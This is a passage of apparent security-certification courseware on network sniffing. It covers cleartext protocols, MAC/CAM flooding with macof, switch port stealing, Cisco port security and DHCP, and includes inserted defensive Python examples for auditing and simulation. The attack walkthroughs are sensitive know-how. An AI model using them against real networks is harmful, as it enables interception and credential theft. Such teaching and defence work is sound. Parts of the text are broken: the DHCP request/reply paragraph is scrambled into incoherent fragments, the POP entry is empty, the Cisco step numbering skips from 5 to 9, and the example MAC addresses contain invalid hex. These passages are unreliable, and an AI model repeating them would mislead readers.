Figure 8.8: Redirecting the traffic to the attacker

Step 6: Now, the attacker can see all the data sent and received by the victim. The attacker can now extract sensitive information from the packets, such as passwords, usernames, credit card details, and PINs.

Figure 8.9: Attacker extracting sensitive information
Protocols Vulnerable to Sniffing

The following protocols are vulnerable to sniffing. The main reason for sniffing these protocols is to acquire passwords.
Telnet and Rlogin

Telnet is a protocol used for communicating with a remote host (via port 23) on a network using a command-line terminal. rlogin enables an attacker to log in to a network machine remotely via a TCP connection. Neither of these protocols provides encryption; therefore, data traveling between clients connected through any of these protocols are in plaintext and vulnerable to sniffing. Attackers can sniff keystrokes, including usernames and passwords.
HTTP

Due to vulnerabilities in the default version of HTTP, websites implementing HTTP transfer user data across the network in plaintext, which attackers can read to steal user credentials.

SNMP

Simple Network Management Protocol (SNMP) is a TCP/IP-based protocol used for exchanging management information between devices connected on a network. The first version of SNMP (SNMPv1) does not offer strong security, which leads to the transfer of data in a cleartext format. Attackers exploit the vulnerabilities in this version to acquire passwords in plaintext.

SMTP

Simple Mail Transfer Protocol (SMTP) is used for transmitting email messages over the Internet. In most implementations, SMTP messages are transmitted in cleartext, which enables attackers to capture plaintext passwords. Further, SMTP does not provide any protection against sniffing attacks.

NNTP

Network News Transfer Protocol (NNTP) distributes, inquires into, retrieves, and posts news articles using a reliable stream-based transmission of news among the ARPA-Internet community. However, this protocol fails to encrypt the data, which allows attackers to sniff sensitive information.

POP

IMAP

Internet Message Access Protocol (IMAP) allows a client to access and manipulate electronic mail messages on a server. This protocol offers inadequate security, which allows attackers to obtain data and user credentials in cleartext.
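To find out which of the protocols listed above are actually carrying credentials in the clear on a network (the audit a defender runs before retiring them in favour of their encrypted counterparts), the following Python program, an added example rather than courseware code, inspects application payloads of the kind a SPAN-port capture yields and reports each flow that carries a credential, with the secret itself redacted so the report can be circulated. Port numbers are the IANA defaults; the sample payloads, the SNMPv1 community string "public" and the function names are constructed for this example.

```python
"""Audit captured flows for cleartext authentication.

Added example, not from the courseware. Given application payloads of the
kind a SPAN-port capture yields, it reports each flow on one of the
protocols listed above that carries a credential in the clear, with the
secret redacted so the report can be shared. Port numbers are the IANA
defaults; every payload below is constructed.
"""
import re

CLEARTEXT_PORTS = {
    23: "telnet", 513: "rlogin", 80: "http", 161: "snmp",
    25: "smtp", 119: "nntp", 110: "pop3", 143: "imap",
}

# A match marks a credential exchange; group 1 is the secret and is redacted.
CREDENTIAL_PATTERNS = {
    "pop3": re.compile(rb"^PASS\s+(\S+)", re.I | re.M),
    "imap": re.compile(rb"^\S+\s+LOGIN\s+\S+\s+(\S+)", re.I | re.M),
    "smtp": re.compile(rb"^AUTH\s+(?:PLAIN|LOGIN)\s+(\S+)", re.I | re.M),
    "http": re.compile(rb"^Authorization:\s*Basic\s+(\S+)", re.I | re.M),
    "nntp": re.compile(rb"^AUTHINFO\s+PASS\s+(\S+)", re.I | re.M),
}


def snmp_v1_community(payload: bytes):
    """Return the community string of an SNMPv1 message, else None.

    Minimal BER walk: SEQUENCE, INTEGER version (0 = SNMPv1), OCTET STRING
    community. Only short-form lengths are handled, which covers ordinary requests.
    """
    if len(payload) < 7 or payload[0] != 0x30 or payload[2:5] != b"\x02\x01\x00":
        return None
    if payload[5] != 0x04:
        return None
    n = payload[6]
    return payload[7:7 + n] if len(payload) >= 7 + n else None


def audit_flow(dst_port: int, payload: bytes):
    """Return a finding dict for a cleartext protocol, or None for anything else."""
    proto = CLEARTEXT_PORTS.get(dst_port)
    if proto is None:
        return None
    finding = {"protocol": proto, "port": dst_port, "credential": False, "evidence": ""}
    if proto == "snmp":
        community = snmp_v1_community(payload)
        if community is not None:
            finding["credential"] = True
            finding["evidence"] = f"SNMPv1 community string ({len(community)} chars, redacted)"
    elif proto in ("telnet", "rlogin"):
        # The keystrokes themselves are the credential, so any session counts.
        finding["credential"] = True
        finding["evidence"] = "interactive session: keystrokes in the clear"
    else:
        m = CREDENTIAL_PATTERNS[proto].search(payload)
        if m:
            finding["credential"] = True
            redacted = m.group(0).replace(m.group(1), b"<redacted>")
            finding["evidence"] = redacted.decode("ascii", "replace")
    return finding


# Constructed flows: (destination port, first bytes of the application payload)
SAMPLE_FLOWS = [
    (110, b"USER alice\r\nPASS hunter2\r\n"),
    (80, b"GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic YWxpY2U6aHVudGVyMg==\r\n\r\n"),
    # SNMPv1 GetRequest for sysDescr.0 (1.3.6.1.2.1.1.1.0) with community "public"
    (161, bytes.fromhex("302902010004067075626c6963a01c020401020304020100020100"
                        "300e300c06082b060102010101000500")),
    (143, b"a001 LOGIN alice secret\r\n"),
    (443, b"\x16\x03\x01"),   # TLS handshake: not on the cleartext list, ignored
]


def audit_all(flows):
    return [f for f in (audit_flow(p, d) for p, d in flows) if f]


if __name__ == "__main__":
    for finding in audit_all(SAMPLE_FLOWS):
        print(finding)
```

Port-based classification alone would flag a flow as "telnet" even when the port carries something else, which is why the payload is checked for the protocol's own authentication command; the reverse blind spot (cleartext protocols on non-standard ports) needs a protocol detector rather than a port table.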
Sniffing in the Data Link Layer of the OSI Model

The data link layer is the second layer of the OSI model. It provides services to the layer above and receives services from the layer below. In this layer, data packets are encoded and decoded into bits. Sniffers operate at the data link layer and can capture packets from this layer. Networking layers in the OSI model are designed to work independently of each other; thus, if a sniffer sniffs data in the data link layer, the upper OSI layers will not be aware of the sniffing.

Figure 8.10: Sniffing at the data link layer of the OSI model
Hardware Protocol Analyzers

A hardware protocol analyzer is a device that interprets traffic passing over a network. It captures signals without altering the traffic segment. Its purpose is to monitor network usage and identify malicious network traffic generated by hacking software installed on the network. It captures a data packet, decodes it, and analyzes its content according to predetermined rules. It allows an attacker to see the individual data bytes of each packet passing through the network.

Compared to software protocol analyzers, hardware protocol analyzers are capable of capturing more data without packet drops at the time of data overload. Hardware protocol analyzers provide a wide range of network connection options varying from LAN, WAN, and wireless to circuit-based telco network lines. They are capable of displaying bus states and low-level events such as high-speed negotiation (K/J chirps), transmission errors, and retransmissions. The analyzers provide accurate timestamps of the captured traffic. However, hardware analyzers are more expensive and tend to be out of reach for individual developers, hobbyists, and ordinary hackers.

Hardware protocol analyzers from different manufacturers include:

• Voyager M4x Protocol Analyzer

Source: https://teledynelecroy.com

The Voyager M4x analyzer platform provides accurate and reliable capture of USB4 and Thunderbolt 3 protocols for fast debugging, analysis, and problem-solving. Voyager M4x features the highest-fidelity probe design and provides unmatched reliability when testing devices at the full USB4 Gen3x2 (40 Gb/s aggregate) speed.
Figure 8.11: Voyager M4x Protocol Analyzer

• N2X N5540A Agilent Protocol Analyzer

Source: https://www.valuetronics.com

The Agilent N2X is a test solution for testing the development and deployment of network services for converging network infrastructures. Service providers, network equipment manufacturers (NEMs), and component manufacturers can verify service attributes of entire networks end-to-end, while also isolating problems down to individual networking devices and subsystems. Two different types of cards can be configured simultaneously, allowing for test scenarios that use a combination of port types.

Figure 8.12: N2X N5540A Agilent Protocol Analyzer

Some examples of hardware protocol analyzers are listed below:

• Keysight E2960B (https://www.keysight.com)
• STINGA Protocol Analyzer (https://utelsystems.com)
• NETSCOUT OneTouch AT Network Assistant (https://enterprise.netscout.com)
• NETSCOUT OptiView XG Network Analysis Tablet (https://enterprise.netscout.com)
• Agilent (Keysight) Technologies 8753ES (https://www.microlease.com)
SPAN Port

Switched Port Analyzer (SPAN) is a Cisco switch feature, also known as "port mirroring," that monitors network traffic on one or more ports on the switch. A SPAN port is a port that is configured to receive a copy of every packet that passes through a switch. It helps to analyze and debug data, identify errors, and investigate unauthorized network access. When port mirroring is on, the network switch sends a copy of the network packets from the source port to the destination port, which studies the network packets with the help of a network analyzer. There can be one or more sources, but there should be only one destination port on the switch. Source ports are the ports for which network packets are monitored and mirrored. The user can simultaneously monitor the traffic of multiple ports, such as the traffic on all the ports of a specific virtual local area network (VLAN).

Figure 8.13: Working of SPAN
Wiretapping

Wiretapping, or telephone tapping, refers to the monitoring of telephone or Internet conversations by a third party with covert intentions. To perform wiretapping, the attacker first selects a target person or host on the network to wiretap and then connects a listening device (hardware, software, or a combination of both) to the circuit carrying information between the two target phones or hosts. Typically, the attacker uses a small amount of the electrical signals generated by the telephone wires to tap the conversation. This allows attackers to monitor, intercept, access, and record information contained in the data flow in a communication system.

Methods of Wiretapping

The following are ways to perform wiretapping:

• The official tapping of telephone lines
• The unofficial tapping of telephone lines
• Recording the conversation
• Direct line wiretap
• Radio wiretap
Types of Wiretapping

There are two types of wiretapping that an attacker can use to monitor, record, and even alter the data flow in the communication system.

• Active Wiretapping

In hacking terminology, active wiretapping is an MITM attack. This allows an attacker to monitor and record the traffic or data flow in a communication system. The attacker can also alter or inject data into the communication or traffic.

• Passive Wiretapping

Passive wiretapping is snooping or eavesdropping. This allows an attacker to monitor and record traffic. By observing the recorded traffic flow, the attacker can snoop for a password or other information.

Note: Wiretapping without a warrant or the consent of the people conducting the conversation is a criminal offense and is punishable in most countries, depending on the country's law.
Lawful Interception

Lawful interception (LI) refers to legally intercepting data communication between two endpoints for surveillance on traditional telecommunications, VoIP, data, and multiservice networks. LI obtains data from a communication network for analysis or evidence. This is useful in activities like infrastructure management and protection, as well as cybersecurity-related issues. Here, the network operator or service provider legally sanctions access to private network data for monitoring private communications like telephone calls and email messages. Such operations are carried out by law enforcement agencies (LEAs).

This type of interception is necessary only to monitor messages exchanged on suspicious channels in which the users are engaged in illegal activity. Countries around the world are making strides to standardize this type of procedure for interception.

The figure shows the telco/ISP lawful interception solution provided by the Decision Computer Group. The solution consists of one tap/access switch and multiple systems for the reconstruction of intercepted data. The tap/access switch collects traffic from the Internet service provider (ISP) network, sorts the traffic by IP domain, and serves it to E-Detective (ED) systems that decode and reconstruct the intercepted traffic into its original format. The tool performs this with the help of supporting protocols such as POP3, IMAP, SMTP, P2P, FTP, and telnet. The Centralized Management Server (CMS) manages all the ED systems.
Sniffing Technique: MAC Attacks

Attackers use various sniffing techniques, such as MAC attacks, DHCP attacks, ARP poisoning, spoofing attacks, and DNS poisoning, to steal and manipulate sensitive data. Attackers use these techniques to gain control over a target network by reading captured data packets and then using that information to break into the network.

This section discusses MAC attacks or MAC flooding. Attackers use the MAC flooding technique to force a switch to act as a hub, so that they can easily sniff the traffic.
MAC Address/CAM Table

MAC Address

A MAC address uniquely identifies each node of a network. Each device in the network has a MAC address associated with a physical port on the network switch, which makes it possible to designate a specific single point of the network. MAC addresses are used as network addresses for most IEEE 802 network technologies, including Ethernet. Logically, the MAC protocol in the OSI reference model uses MAC addresses for information transfer.

A MAC address comprises 48 bits that are split into two sections, each containing 24 bits. The first section contains the ID number of the organization that manufactured the adapter and is called the organizationally unique identifier (OUI). The next section contains the serial number assigned to the NIC adapter and is called the NIC specific.

The MAC address is written as 12 hexadecimal digits, divided into three or six groups. The first six digits indicate the manufacturer, while the next six digits indicate the adapter's serial number. For example, consider the MAC address D4-BE-D9-14-C8-29. The first six digits, i.e., D4BED9, indicate the manufacturer (Dell, Inc.), and the next six digits, 14C829, indicate the serial number of the adapter.
Figure 8.15: MAC address (3 bytes: organizationally unique identifier (OUI); 3 bytes: network interface controller (NIC) specific; first octet bits a8 to a1, where a1 = 0 means unicast and 1 means multicast, and a2 = 0 means globally unique and 1 means locally administered)
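The decomposition just described, as an added Python example that is not from the courseware: it splits a MAC address into its OUI and NIC-specific halves and reads the two flag bits of the first octet shown in Figure 8.15 (the unicast/multicast bit and the globally-unique/locally-administered bit). OUI_VENDORS is a constructed stub holding only the Dell prefix quoted in the text; a real tool would consult the IEEE OUI registry. Function names are this example's own.

```python
"""Decode the structure of a 48-bit MAC address.

Added example (not from the courseware). It splits the address into the
OUI and NIC-specific halves and reads the two flag bits of the first octet
that Figure 8.15 labels: the I/G bit (unicast/multicast) and the U/L bit
(globally unique/locally administered). OUI_VENDORS is a constructed stub
holding only the Dell prefix used in the text; a real tool would consult the
IEEE OUI registry.
"""
import re

_SEP = re.compile(r"[-:.]")

# Constructed stub; only the prefix quoted in the text is present.
OUI_VENDORS = {"D4BED9": "Dell, Inc."}


def parse_mac(mac: str) -> bytes:
    """Accept D4-BE-D9-14-C8-29, d4:be:d9:14:c8:29 or d4be.d914.c829."""
    hexdigits = _SEP.sub("", mac).upper()
    if len(hexdigits) != 12 or not re.fullmatch(r"[0-9A-F]{12}", hexdigits):
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return bytes.fromhex(hexdigits)


def decode_mac(mac: str) -> dict:
    """Return the OUI, NIC-specific part, vendor (from the stub) and the two flag bits."""
    raw = parse_mac(mac)
    first = raw[0]
    oui = raw[:3].hex().upper()
    return {
        "oui": oui,
        "nic_specific": raw[3:].hex().upper(),
        "vendor": OUI_VENDORS.get(oui, "unknown (not in stub table)"),
        # bit a1 (least significant bit of the first octet): 0 unicast, 1 multicast
        "multicast": bool(first & 0x01),
        # bit a2: 0 globally unique (burned in by the vendor), 1 locally administered
        "locally_administered": bool(first & 0x02),
    }


if __name__ == "__main__":
    for sample in ("D4-BE-D9-14-C8-29", "01:00:5e:00:00:fb", "02-00-00-aa-bb-cc"):
        print(sample, decode_mac(sample))
```

The locally administered bit is worth surfacing in a CAM table review: a burned-in address has it clear, so a source address with it set was chosen by software. That is a hint rather than a verdict, since virtual machines and privacy-randomised client addresses set it legitimately.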
CAM Table

A CAM table is a dynamic table of fixed size. It stores information such as the MAC addresses available on physical ports along with the VLAN parameters associated with them. When a machine sends data to another machine in a network, the data passes through the switch. The switch searches for the destination MAC address (located in the Ethernet frame) in its CAM table, and once the MAC address is found, it forwards the data to the machine through the port with which the MAC address is bound. This method of transferring data in a switched network is more secure than that of a hub-based network, in which the hub forwards the incoming traffic to all the machines in the network.
How CAM Works

A CAM table refers to the dynamic form of content and works with an Ethernet switch. The Ethernet switch maintains connections between ports, and the CAM table keeps track of MAC addresses.

1. Machine A broadcasts an ARP request to the switch. The request contains the IP address of the target machine (Machine B), along with the source machine's (Machine A) MAC and IP addresses. The switch then broadcasts this ARP request to all the hosts in the network and waits for the reply.

Figure 8.16: Working of CAM table, step 1

2. Machine B possesses the target/destination IP address, so it sends an ARP reply along with its MAC address. The CAM table stores this MAC address along with the port on which this machine is connected.

Figure 8.17: Working of CAM table, step 2

3. Now the connection is successfully established, and Machine A forwards the traffic to Machine B, while Machine C is unable to see the traffic flowing between them.

Figure 8.18: Working of CAM table, step 3
What Happens When a CAM Table Is Full?

As discussed, a CAM table contains network information such as the MAC addresses available on physical switch ports and the associated VLAN parameters. A CAM table's limited size renders it susceptible to attacks from MAC flooding, which bombards the switch with fake source MAC addresses until the CAM table is full. Thereafter, the switch broadcasts all incoming traffic to all ports. This causes the switch to reset to its learning mode, causing the switch to broadcast on every port similar to a hub, thereby enabling the attacker to monitor the frames sent from the victim host to another host without any CAM table entry. This attack also fills the CAM tables of adjacent switches.

The figure illustrates how a CAM table can be flooded with fake MAC addresses to monitor the frames sent from the victim host to another host without any CAM table entry.

Figure 8.19: Flooding a CAM table
MAC Flooding

MAC flooding is a technique used to compromise the security of network switches that connect network segments or devices. Attackers use the MAC flooding technique to force a switch to act as a hub so that they can easily sniff the traffic.

In a switched network, an Ethernet switch contains a CAM table that stores all the MAC addresses of devices connected in the network. A switch acts as an intermediate device between one or more computers in a network. It looks for Ethernet frames, which carry the destination MAC address; then, it tallies this address with the MAC addresses in its CAM table and forwards the traffic to the destined machine. Unlike a hub, which broadcasts data across the network, a switch sends data only to the intended recipient. Thus, a switched network is more secure compared to a hub network. However, the size of the CAM table is fixed, and as it can store only a limited number of MAC addresses, an attacker may send numerous fake MAC addresses to the switch. No problem occurs until the MAC address table is full. Once the MAC address table is full, any further requests may force the switch to enter fail-open mode. In fail-open mode, the switch starts behaving like a hub and broadcasts all the incoming traffic through all the ports in the network. The attacker then changes his/her machine's NIC to promiscuous mode to enable the machine to accept all the traffic entering it. Thus, attackers can sniff the traffic easily and steal sensitive information.

Figure 8.20: MAC flooding

MAC Flooding Switches with macof

Source: https://monkey.org

macof is a Unix/Linux tool that is a part of the dsniff collection. It floods the local network with random MAC and IP addresses, causing some switches to fail and open in repeating mode, thereby facilitating sniffing. This tool floods the switch's CAM tables (131,000 per min) by sending forged MAC entries. When the MAC table fills up, and the switch converts to hub-like operation, an attacker can monitor the data being broadcast.

Figure 8.21: MAC flooding using macof
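A model of the CAM behaviour described in this section and the two before it (how the table learns and forwards, and what a full table does to traffic for a station it no longer holds), as an added Python example that is code from neither the courseware nor dsniff. The capacity of four entries, the port names, the MAC addresses and the frame sequence are constructed for the demonstration; the class and function names are this example's own.

```python
"""Fixed-capacity CAM table: learning, forwarding, and fail-open on overflow.

Added example, not the courseware's code. It models the behaviour described
above: a switch learns (source MAC -> ingress port) from every frame,
forwards a known destination out of one port, floods an unknown destination
to every other port, and once the table is full it can no longer learn new
stations, so a station that has aged out stays unknown and its traffic is
flooded to all ports exactly as a hub would. The capacity of four entries,
the port names and the frames are constructed for this demonstration.
"""
from collections import OrderedDict


class CamTable:
    def __init__(self, ports, capacity):
        self.ports = list(ports)
        self.capacity = capacity
        self.entries = OrderedDict()   # mac -> port
        self.failed_learns = 0         # learn attempts refused because the table was full

    def learn(self, mac, port):
        """Bind mac to port; return False when the table is full."""
        if mac in self.entries:
            self.entries[mac] = port   # station moved: rebind to the new port
            return True
        if len(self.entries) >= self.capacity:
            self.failed_learns += 1
            return False
        self.entries[mac] = port
        return True

    def age_out(self, mac):
        """Remove an idle entry, as the ageing timer does on a real switch."""
        self.entries.pop(mac, None)

    def forward(self, src, dst, ingress):
        """Return the egress port list for one frame (learn first, then look up)."""
        self.learn(src, ingress)
        out = self.entries.get(dst)
        if out is not None and out != ingress:
            return [out]                                 # unicast to the bound port
        return [p for p in self.ports if p != ingress]   # unknown: flood (hub behaviour)

    def is_full(self):
        return len(self.entries) >= self.capacity


HOST_A, HOST_B = "aa-aa-aa-aa-aa-01", "bb-bb-bb-bb-bb-02"   # constructed addresses
BROADCAST = "ff-ff-ff-ff-ff-ff"


def simulate(capacity=4, fake_frames=20):
    """Return (egress for A->B before the flood, egress after it, refused learns)."""
    sw = CamTable(ports=["PortA", "PortB", "PortC"], capacity=capacity)
    # Normal operation: A and B are learned, so A -> B leaves on PortB only.
    sw.forward(HOST_A, HOST_B, "PortA")          # first frame: B unknown, flooded once
    sw.forward(HOST_B, HOST_A, "PortB")
    before = sw.forward(HOST_A, HOST_B, "PortA")
    # Frames with fake source MACs arriving on PortC fill the remaining slots.
    for i in range(fake_frames):
        sw.forward(f"de-ad-be-ef-00-{i:02x}", BROADCAST, "PortC")
    # B goes idle and ages out; another fake MAC takes the freed slot, so B
    # cannot be re-learned while the flood continues.
    sw.age_out(HOST_B)
    sw.forward("de-ad-be-ef-ff-ff", BROADCAST, "PortC")
    after = sw.forward(HOST_A, HOST_B, "PortA")  # B unknown: flooded to PortC as well
    return before, after, sw.failed_learns


if __name__ == "__main__":
    print(simulate())   # (['PortB'], ['PortB', 'PortC'], 18)
```

The count of refused learns is the quantity to watch: a sudden rise in distinct source MAC addresses on a single access port is the condition that the port security feature discussed later in this module acts on, and the same figure is visible on a real switch as the CAM table utilisation.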
Switch Port Stealing

The switch port stealing sniffing technique uses MAC flooding to sniff the packets. The attacker floods the switch with forged gratuitous ARP packets with the target MAC address as the source and his/her own MAC address as the destination. A race condition between the attacker's flooded packets and the target host's packets will occur, and thus the switch has to constantly change its MAC address binding between two different ports. In this case, if the attacker is fast enough, he/she will be able to direct the packets intended for the target host toward his/her switch port. Here, the attacker manages to steal the target host's switch port and sends an ARP request to this switch port to discover the target host's IP address. When the attacker gets an ARP reply, this indicates that the target host's switch port binding has been restored and the attacker can now sniff the packets sent towards the targeted host.
Figure 8.22: Switch port stealing (Layer 2 switch, target, and attacker; logical connection versus real connection)

Assume that there are three machines in a network: Host A, the target's Host B, and the attacker's Host C.

Machine | MAC Address       | IP Address
Host A  | aa-bb-cc-dd-ee-ff | 10.0.0.1
Host B  | bb-cc-dd-ee-ff-gg | 10.0.0.2
Host C  | cc-dd-ee-ff-gg-hh | 10.0.0.3

Table 8.2: Details of three hosts in a network

The switch's ARP cache and MAC table contain the following values:

Host   | MAC Address       | IP Address | Type
Host A | aa-bb-cc-dd-ee-ff | 10.0.0.1   | Learn
Host B | bb-cc-dd-ee-ff-gg | 10.0.0.2   | Learn
Host C | cc-dd-ee-ff-gg-hh | 10.0.0.3   | Learn

Table 8.3: MAC table

IP Address | MAC Address
10.0.0.1   | aa-bb-cc-dd-ee-ff
10.0.0.2   | bb-cc-dd-ee-ff-gg
10.0.0.3   | cc-dd-ee-ff-gg-hh

Table 8.4: ARP cache table
1. Switch port stealing is a sniffing technique used by an attacker who spoofs both the IP address and the MAC address of the target machine (Host B).

Machine | MAC Address       | IP Address
Host A  | aa-bb-cc-dd-ee-ff | 10.0.0.1
Host B  | bb-cc-dd-ee-ff-gg | 10.0.0.2
Host C  | bb-cc-dd-ee-ff-gg | 10.0.0.2

Table 8.5: Switch updated with a spoofed entry

2. The attacker's machine runs a sniffer that turns the machine's NIC adapter to promiscuous mode.

3. Host A, associated with the IP address 10.0.0.1, wants to communicate with Host B, associated with the IP address 10.0.0.2. Therefore, Host A sends an ARP request ("I want to communicate with 10.0.0.2. What is the MAC address of 10.0.0.2?").

4. The switch broadcasts this ARP request to all the machines in the network.

5. Before Host B (the target machine) can respond to the ARP request, the attacker responds to it by sending an ARP reply containing the spoofed MAC and IP addresses ("I am 10.0.0.2, and my MAC address is bb-cc-dd-ee-ff-gg"). The attacker can achieve this by launching an attack such as denial of service (DoS) on Host B, which slows down its response.

6. Now the ARP cache in the switch records the spoofed MAC and IP addresses.

IP Address | MAC Address
10.0.0.1   | aa-bb-cc-dd-ee-ff
10.0.0.2   | bb-cc-dd-ee-ff-gg
10.0.0.2   | bb-cc-dd-ee-ff-gg

Table 8.6: ARP cache updated with spoofed entry

7. The switch's MAC table is likewise updated with the spoofed entry.

Host   | MAC Address       | IP Address | Type  | Age | Port
Host A | aa-bb-cc-dd-ee-ff | 10.0.0.1   | learn | 0   | Port A
Host B | bb-cc-dd-ee-ff-gg | 10.0.0.2   | learn | 0   | Port B
Host C | bb-cc-dd-ee-ff-gg | 10.0.0.2   | learn | 0   | Port C

Table 8.7: MAC table updated with a spoofed entry

8. Now, the switch will forward all the packets directed towards Host B to Host C through Port C, i.e., the attacker's machine. Thus, an attacker can sniff the packets sent to Host B.
How to Defend against MAC Attacks

Port security can be used to restrict inbound traffic to only a selected set of MAC addresses and to limit MAC flooding attacks: traffic whose source address does not match any of the identified secure MAC addresses is not forwarded. Once the maximum number of secure MAC addresses on the port is set, the secure MAC addresses are included in an address table in any of the following three ways:

• You can configure all secure MAC addresses by using the switchport port-security mac-address interface configuration command.
• You can allow the port to dynamically configure secure MAC addresses with the MAC addresses of the connected devices.
• You can configure a number of addresses and allow the rest to be dynamically configured.

Port security limits MAC flooding attacks and locks down ports, sending an SNMP trap. As shown in the figure, the attacker floods the switch CAM tables with fake MAC addresses and thus threatens security by turning a switch into a hub.
Figure 8.23: Flooding CAM tables

As shown in the figure, the number of MAC addresses allowed on the switch port is limited to one; therefore, the MAC requests are recognized as flooding. Port security locks down the port and sends an SNMP trap.

Figure 8.24: Blocking MAC flooding (only one MAC address allowed on the switch port)

Configuring Port Security on Cisco Switch

Source: https://www.cisco.com

Steps to restrict traffic through a port by limiting and identifying the MAC addresses of the stations allowed to access the port:

1. interface interface_id
   Enters interface configuration mode and enters the physical interface to configure, for example, gigabitethernet 3/1.

2. switchport mode access
   Sets the interface mode as access; an interface in the default mode (dynamic desirable) cannot be configured as a secure port.

3. switchport port-security
   Enables port security on the interface.

4. switchport port-security maximum value
   Sets the maximum number of secure MAC addresses for the interface. The range is 1 to 3072; the default is 1.

5. switchport port-security violation {restrict | shutdown}
   Sets the violation mode, the action to be taken when a security violation is detected.

9. end
   Returns to privileged EXEC mode.

10. show port-security address
   Verifies your entries.

Some additional commands to configure the Cisco port security feature:

switchport port-security maximum 1 vlan access
   Sets the maximum number of secure MAC addresses for the interface. The range is 1 to 3072. The default is 1.
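The port security behaviour described above, together with the switch-side symptom of the port stealing race from the previous section, as an added Python example that is not Cisco code: each port has a maximum number of secure MAC addresses (default 1), learns secure addresses dynamically up to that maximum, and applies either the restrict or the shutdown violation mode, with a list standing in for the SNMP traps. A secure address already learned on one port that appears as a source on another port is also treated as a violation, which is how a switch sees the forged frames of the port stealing walkthrough. The port names, the violation configuration and the frame sequence are constructed; the bb-cc-dd-ee-ff-gg style addresses are the placeholders the text uses.

```python
"""Port security with restrict/shutdown violation modes, applied to frames.

Added example, not Cisco's code. It models the per-port behaviour described
above: a maximum number of secure MAC addresses per port (default 1),
dynamic learning of secure addresses up to that maximum, and the restrict
and shutdown violation modes, with a list standing in for the SNMP traps
sent on every violation. A secure address already learned on one port that
shows up as a source on another port is also a violation; on the switch that
is the symptom of the port stealing race described earlier. Port names, the
configuration and the frame sequence are constructed; the bb-cc-dd-ee-ff-gg
style addresses are the placeholders used in the text.
"""
from dataclasses import dataclass, field


@dataclass
class PortState:
    maximum: int = 1                  # switchport port-security maximum
    violation: str = "shutdown"       # switchport port-security violation {restrict | shutdown}
    secure_macs: set = field(default_factory=set)
    err_disabled: bool = False
    violations: int = 0


class PortSecurity:
    def __init__(self, config):
        self.ports = {name: PortState(**opts) for name, opts in config.items()}
        self.traps = []               # stand-in for the SNMP traps the switch would send

    def _violate(self, name, port, mac, reason):
        port.violations += 1
        self.traps.append(f"{name}: {reason} [{mac}]")
        if port.violation == "shutdown":
            port.err_disabled = True  # port is locked down until an operator clears it
        return "drop"                 # restrict mode: drop the frame, keep the port up

    def ingress(self, name, src_mac):
        """Process one frame arriving on port `name`; return 'forward' or 'drop'."""
        port = self.ports[name]
        if port.err_disabled:
            return "drop"
        if src_mac in port.secure_macs:
            return "forward"
        for other, state in self.ports.items():
            if other != name and src_mac in state.secure_macs:
                return self._violate(name, port, src_mac, f"MAC secured on {other} seen here")
        if len(port.secure_macs) >= port.maximum:
            return self._violate(name, port, src_mac, "maximum secure MACs exceeded")
        port.secure_macs.add(src_mac)  # dynamic learning of a secure address
        return "forward"


def run_scenario():
    """Replay the constructed frame sequence; return (PortSecurity, per-frame results)."""
    ps = PortSecurity({
        "PortA": {"maximum": 1, "violation": "shutdown"},
        "PortB": {"maximum": 1, "violation": "shutdown"},
        "PortC": {"maximum": 1, "violation": "restrict"},
    })
    frames = [
        ("PortA", "aa-bb-cc-dd-ee-ff"),   # Host A learned on PortA
        ("PortB", "bb-cc-dd-ee-ff-gg"),   # Host B learned on PortB
        ("PortC", "cc-dd-ee-ff-gg-hh"),   # Host C learned on PortC
        ("PortC", "bb-cc-dd-ee-ff-gg"),   # Host C forges Host B's MAC: violation, dropped
        ("PortC", "de-ad-be-ef-00-01"),   # flood of fake source MACs on PortC ...
        ("PortC", "de-ad-be-ef-00-02"),   # ... each one a violation; restrict keeps PortC up
        ("PortC", "de-ad-be-ef-00-03"),
        ("PortB", "de-ad-be-ef-00-04"),   # fake MAC on a shutdown-mode port: PortB err-disabled
        ("PortB", "bb-cc-dd-ee-ff-gg"),   # even the legitimate host is now dropped on PortB
    ]
    return ps, [ps.ingress(p, m) for p, m in frames]


if __name__ == "__main__":
    ps, results = run_scenario()
    print(results)
    print("\n".join(ps.traps))
```

The scenario shows the trade-off between the two violation modes: restrict keeps the port usable for the one secured host and counts violations, while shutdown takes the port out of service on the first offending frame and needs an operator (or errdisable recovery) to restore it, which is also why a flood aimed at a shutdown-mode port doubles as a denial of service against the legitimate host behind it.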
Sniffing Technique: DHCP Attacks

This section discusses various Dynamic Host Configuration Protocol (DHCP) attacks. A DHCP attack is an active sniffing technique used by attackers to steal and manipulate sensitive data. This section describes how DHCP works, DHCP starvation attacks, tools used for starvation attacks, rogue server attacks, and different ways to defend against DHCP attacks.

How DHCP Works

DHCP is a client-server protocol that provides an IP address to an IP host. In addition to the IP address, the DHCP server also provides configuration-related information such as the default gateway and subnet mask. When a DHCP client device boots up, it participates in traffic broadcasting. DHCP can assign IP configuration to hosts connecting to a network. The distribution of IP configuration to hosts simplifies the administrator's work to maintain IP networks.

DHCP servers maintain TCP/IP configuration information in a database, such as valid TCP/IP configuration parameters, valid IP addresses, and the duration of the lease offered by the server. It provides address configurations to DHCP-enabled clients in the form of a lease offer.

Working of DHCP:

1. The client broadcasts a DHCPDISCOVER/SOLICIT request asking for DHCP configuration information.
2. A DHCP-relay agent captures the client request and unicasts it to the DHCP servers available in the network.
3. The relay agent broadcasts DHCPOFFER/ADVERTISE in the client's subnet.
4. The client broadcasts DHCPREQUEST/REQUEST asking the DHCP server to provide the DHCP configuration information.
5. The DHCP server sends a unicast DHCPACK/REPLY message to the client with the IP configuration and information.

Figure 8.25: Working of DHCP
DHCPRequest/Reply
Messages
DHCPRequest/Reply
Messages
A devicethat already hasan IPaddresscan use the simple request/reply exchange to obtain
otherconfiguration parameters froma DHCPserver. Whenthe DHCPclientreceives a DHCP
offer,the clientimmediately responds bysending backa DHCP request packet.Devices that are
not usingDHCPto acquireIP addresses otherconfiguration
can stillutilizeDHCP’s capabilities.A
client can broadcast@DHCPINFORM message to requestthat any availableserver send its
parameters on the usageof the network.DHCPservers respond with the requested parameters
that a
and/or default parameterscarriedin DHCPoptionsof DHCPACK message. If aDHCPrequest
comes from a hardware
address
DHCPserver can putthat IP address
is i n the DHCPserver'sreserved
not for the IP addressthat this DHCPserver offered,
backinto the pool
poolandthe requestis
the DHCPserver’s offer is invalid.The
andoffer it to anotherclient.
DHCP | DHCPv6 | Message Description
DHCPDiscover | Solicit | Client broadcast to locate the available DHCP servers
DHCPOffer | Advertise | Server to client in response to DHCPDiscover with the offer of configuration parameters
